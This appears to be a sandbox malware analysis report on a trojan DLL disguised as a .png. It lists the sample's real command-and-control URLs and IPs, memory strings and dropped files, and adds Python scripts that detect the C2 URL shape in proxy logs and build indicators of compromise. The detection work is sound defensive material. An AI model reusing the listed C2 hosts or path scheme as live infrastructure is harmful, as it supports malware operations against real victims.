https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta | true | Avira URL Cloud: safe | unknown
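Every contacted URL above has the same shape: a fixed leading directory ("tire"), many slash-separated chunks of base64-looking text, "_2B" and "_2F" tokens where base64 would carry "+" and "/", and a short pseudo-extension (".eta" on this sample). None of the URL reputation scanners flagged them, so a shape-based check is what a proxy or DNS team would deploy. The following Python is an added example and not part of the Joe Sandbox report: it scores URLs from a constructed proxy log against that shape, using one URL from the "Contacted URLs" table and one partial URL from the "URLs from Memory and Binaries" table, plus benign controls. The "_2B" to "+" and "_2F" to "/" mapping, the rejoining of chunks before checking the alphabet, and the three-of-four threshold are assumptions drawn from the URLs on this page, not something the report states.

```python
import re
from urllib.parse import urlsplit

# Shape of the C2 URLs in this report (assumptions drawn from the page, see lead-in):
# slash-separated chunks of base64-looking text with "+" and "/" written as "_2B"
# and "_2F", behind a fixed leading directory, ending in a short pseudo-extension.
ESCAPED_TOKEN = re.compile(r"_2B|_2F")
BASE64_BODY = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PSEUDO_EXT = re.compile(r"^[A-Za-z0-9_]+\.[A-Za-z]{2,5}$")


def path_segments(path):
    return [s for s in path.split("/") if s]


def reassemble_body(segments):
    """Drop the leading directory, strip the pseudo-extension from the last chunk,
    glue the chunks back together and undo the assumed _2B/_2F substitution.
    Joining first matters: a token can straddle a chunk boundary (see the
    "h5hri2qU3j_2/FtKG..." sample below)."""
    if len(segments) < 2:
        return ""
    chunks = list(segments[1:])
    chunks[-1] = chunks[-1].rsplit(".", 1)[0]
    return "".join(chunks).replace("_2B", "+").replace("_2F", "/")


def classify_url(url):
    """Return the matched indicators; flag when at least three of four line up."""
    segments = path_segments(urlsplit(url).path)
    body = reassemble_body(segments)
    reasons = []
    if len(segments) >= 4:
        reasons.append("deep_path")
    if ESCAPED_TOKEN.search("/".join(segments)):
        reasons.append("escaped_base64_tokens")
    if len(body) >= 40 and BASE64_BODY.match(body):
        reasons.append("base64_body")
    if segments and PSEUDO_EXT.match(segments[-1]):
        reasons.append("pseudo_extension")
    return {"url": url, "reasons": reasons, "suspicious": len(reasons) >= 3}


def scan_proxy_log(lines):
    """Constructed log format: '<timestamp> <client> <method> <url> <status>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        verdict = classify_url(fields[3])
        if verdict["suspicious"]:
            hits.append(verdict)
    return hits


# Constructed sample log. The first two URLs are taken from this report; the
# others are benign controls, one with a "_2F" inside an ordinary file name.
SAMPLE_LOG = [
    "2021-12-14T10:01:02Z 10.0.0.5 GET https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta 200",
    "2021-12-14T10:01:05Z 10.0.0.5 GET https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT 200",
    "2021-12-14T10:02:00Z 10.0.0.7 GET https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js 200",
    "2021-12-14T10:02:30Z 10.0.0.7 GET https://cdn.example.com/static/build/app_bundle_2F1.js 200",
    "2021-12-14T10:03:00Z 10.0.0.9 GET https://github.com/Pester/Pester 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["url"], "->", ", ".join(hit["reasons"]))
```

The second sample line shows why the chunks are rejoined before the alphabet check: the report's memory string splits "_2F" across "h5hri2qU3j_2" and "FtKGoeU1cGb", so a per-chunk check would miss it. The benign "app_bundle_2F1.js" control collects two indicators and stays below the threshold; tune the threshold and the minimum body length against your own proxy baseline.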

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/MicrosoftEdgeDownload" | loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp | false | | high
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on | regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://berukoneru.website/tyi | rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | false | | high
http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://windows.update3.com/ | regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ | regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp | false | | high
https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html | rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | false | | high
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY | rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT | rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://berukoneru.website/ | rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://constitution.org/usdeclar.txt | loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | false | |
                        • URL Reputation: safe
                        unknown
                        https://berukoneru.website/Orundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/BSregsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/jregsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://nodejs.org06.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAloaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjLregsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZvregsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/jPregsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/LAprundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs


                        Public

IP:79.110.52.144
Domain:berukoneru.website
Country:Romania
ASN:60233
ASN Name:V4ESCROW-ASRO
Malicious:true

IP:18.219.227.107
Domain:prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
Country:United States
ASN:16509
ASN Name:AMAZON-02US
Malicious:false

IP:3.12.124.139
Domain:unknown
Country:United States
ASN:16509
ASN Name:AMAZON-02US
Malicious:true

                        Private

                        IP
                        192.168.2.1
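Read the two tables together: every berukoneru.website URL in the URL table carries Malicious:false and "Avira URL Cloud: safe", while the host's IP 79.110.52.144 is flagged malicious here. A per-URL reputation lookup that returns "safe" for a freshly generated C2 path only says the service has no record of that exact path; it does not clear the host. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it folds both tables into host-level IOCs and lets the IP verdict override the URL reputation. The rows are constructed from the tables on this page (a subset of the URLs, ASN names kept exactly as the report prints them); the "benign"/"unresolved" labels and the ordering are my own triage heuristic.

```python
"""Fold a Joe Sandbox URL table and its contacted-IP table into host-level IOCs.

The rule: a host's IP verdict outranks the per-URL reputation.  A reputation
service returning "safe" for a freshly generated C2 path only says it has no
record of that path; it does not clear the host.
"""
from urllib.parse import urlsplit

# Constructed from the tables on this page: (URL, source process, Malicious, Reputation).
URL_ROWS = [
    ("https://windows.update3.com/", "regsvr32.exe", False, "unknown"),
    ("https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ",
     "regsvr32.exe", False, "unknown"),
    ("https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js", "loaddll32.exe", False, "high"),
    ("https://github.com/Pester/Pester", "powershell.exe", False, "high"),
    ("https://berukoneru.website/", "rundll32.exe", False, "unknown"),
    ("https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY",
     "rundll32.exe", False, "unknown"),
    ("http://constitution.org/usdeclar.txt", "loaddll32.exe", False, "unknown"),
]
# (IP, Domain, Country, ASN, ASN Name, Malicious); ASN names as the report prints them.
IP_ROWS = [
    ("79.110.52.144", "berukoneru.website", "Romania", 60233, "V4ESCROW-ASRO", True),
    ("18.219.227.107", "prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com",
     "United States", 16509, "AMAZON-02US", False),
    ("3.12.124.139", "unknown", "United States", 16509, "AMAZON-02US", True),
]


def host_of(url):
    """Lower-case hostname without the port; '' for strings that are not URLs."""
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:      # e.g. a truncated URL with an unbalanced bracket
        return ""


def build_iocs(url_rows, ip_rows):
    """Group URLs by host and let the contacted-IP verdict override URL reputation."""
    ip_by_domain = {domain.lower(): (ip, bad) for ip, domain, _c, _asn, _name, bad in ip_rows}

    hosts = {}
    for url, proc, url_bad, reputation in url_rows:
        h = host_of(url)
        if not h:
            continue
        e = hosts.setdefault(h, {"urls": [], "processes": set(), "url_bad": False, "reputation": set()})
        e["urls"].append(url)
        e["processes"].add(proc)
        e["url_bad"] = e["url_bad"] or url_bad
        e["reputation"].add(reputation)

    iocs = []
    for h, e in hosts.items():
        ip, ip_bad = ip_by_domain.get(h, (None, None))
        if ip_bad or e["url_bad"]:
            verdict = "malicious"           # the IP flag or any URL flag wins
        elif "high" in e["reputation"]:
            verdict = "benign"              # well-known CDN / code-hosting traffic
        else:
            verdict = "unresolved"          # nothing either way: keep for review
        iocs.append({"host": h, "ip": ip, "verdict": verdict,
                     "urls": sorted(e["urls"]), "processes": sorted(e["processes"])})

    # Flagged IPs with no URL on the page (here 3.12.124.139) are IOCs in their own right.
    covered = {i["ip"] for i in iocs if i["ip"]}
    for ip, _domain, _c, _asn, _name, bad in ip_rows:
        if bad and ip not in covered:
            iocs.append({"host": None, "ip": ip, "verdict": "malicious", "urls": [], "processes": []})

    return sorted(iocs, key=lambda i: (i["verdict"] != "malicious", i["host"] or ""))


if __name__ == "__main__":
    for ioc in build_iocs(URL_ROWS, IP_ROWS):
        print(f"{ioc['verdict']:<10} {ioc['host'] or '-':<28} {ioc['ip'] or '-':<16} "
              f"{len(ioc['urls'])} url(s) via {', '.join(ioc['processes']) or '-'}")
```

windows.update3.com ends up "unresolved" rather than "benign": it has no IP row on this page and no reputation, so it stays on the review list next to the flagged host instead of being dropped.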

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:539457
                        Start date:14.12.2021
                        Start time:10:32:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 6s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:6.png (renamed file extension from png to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:50
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@59/52@16/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 90.2% (good quality ratio 86.1%)
                        • Quality average: 78.9%
                        • Quality standard deviation: 28.8%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 2.20.205.172
                        • Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, www.microsoft.com-c-3.edgekey.net, fs.microsoft.com, store-images.s-microsoft.com, e13678.dscb.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, arc.msn.com, www.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

Time      Type             Description
10:33:33  API Interceptor  6x Sleep call for process: regsvr32.exe modified
10:33:33  API Interceptor  11x Sleep call for process: rundll32.exe modified
10:33:46  API Interceptor  5x Sleep call for process: loaddll32.exe modified
10:34:20  API Interceptor  248x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11606
                        Entropy (8bit):4.883977562702998
                        Encrypted:false
                        SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                        MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                        SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                        SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                        SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                        Malicious:false
                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192
                        Entropy (8bit):5.325275554903011
                        Encrypted:false
                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                        MD5:05CF074042A017A42C1877FC5DB819AB
                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                        Malicious:false
                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                        C:\Users\user\AppData\Local\Temp\RES11BF.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.9923065968914804
                        Encrypted:false
                        SSDEEP:24:HCe9E26c3tuHrhKdNII+ycuZhNqlcakS7lxPNnq9qd:8c3tuVKdu1ulqaa37Bq9K
                        MD5:27C528436B2B3C05916BE7800A1BDCA3
                        SHA1:26B8F391092F85DDFD9F5820E91C7EEA36070D53
                        SHA-256:608F560F77DFA1AC315ABF79CE35E71EBD5E090F1E1335C5E6B4E38995128647
                        SHA-512:7CF7A7C94D4FEC56DC2145DCDDF6F0AD6BD71835ABCB81F1B90BD6817D12989F2063660385122EA17C8DF758058F975FBC3372A1EC83E8F0F030D8B7CE836EC4
                        Malicious:false
                        Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP...............{....|.m....[...........5.......C:\Users\user\AppData\Local\Temp\RES11BF.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        C:\Users\user\AppData\Local\Temp\RES148E.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                        Category:dropped
                        Size (bytes):1332
                        Entropy (8bit):4.003514269567322
                        Encrypted:false
                        SSDEEP:24:HdzW9Nv9U8uHvhKdNII+ycuZhNoakS0PNnq92d:01U8upKdu1uloa3Uq9G
                        MD5:29E70867DFDE4F487090ABBBCB2B484F
                        SHA1:31B7F94349888DF87A60D3A792DF85D31460CA2E
                        SHA-256:C9C2C56C48B397FB5BB9ACFDF50E2ED7EFE06542BAE0BEC0A5581231FA63B8F1
                        SHA-512:43BBC13236AD8C9178FA4BD1CCF0179419EAA5FDA7C8A79B59B814557BAD0125F85D9712070021B5C6D9210138C5E3F1894F8B2CED4CBD2BA973FAB72322ADCA
                        Malicious:false
                        Preview: L.....a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP..................t..).D.>U...N.._..........5.......C:\Users\user\AppData\Local\Temp\RES148E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                        C:\Users\user\AppData\Local\Temp\RES1B16.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):4.001534923476038
                        Encrypted:false
                        SSDEEP:24:HYe9E26qW2KuHrFhKdNII+ycuZhNtakS7PNnq9qd:eqzKuLzKdu1ulta3xq9K
                        MD5:40F552368035B59FB38A94FC74FE0504
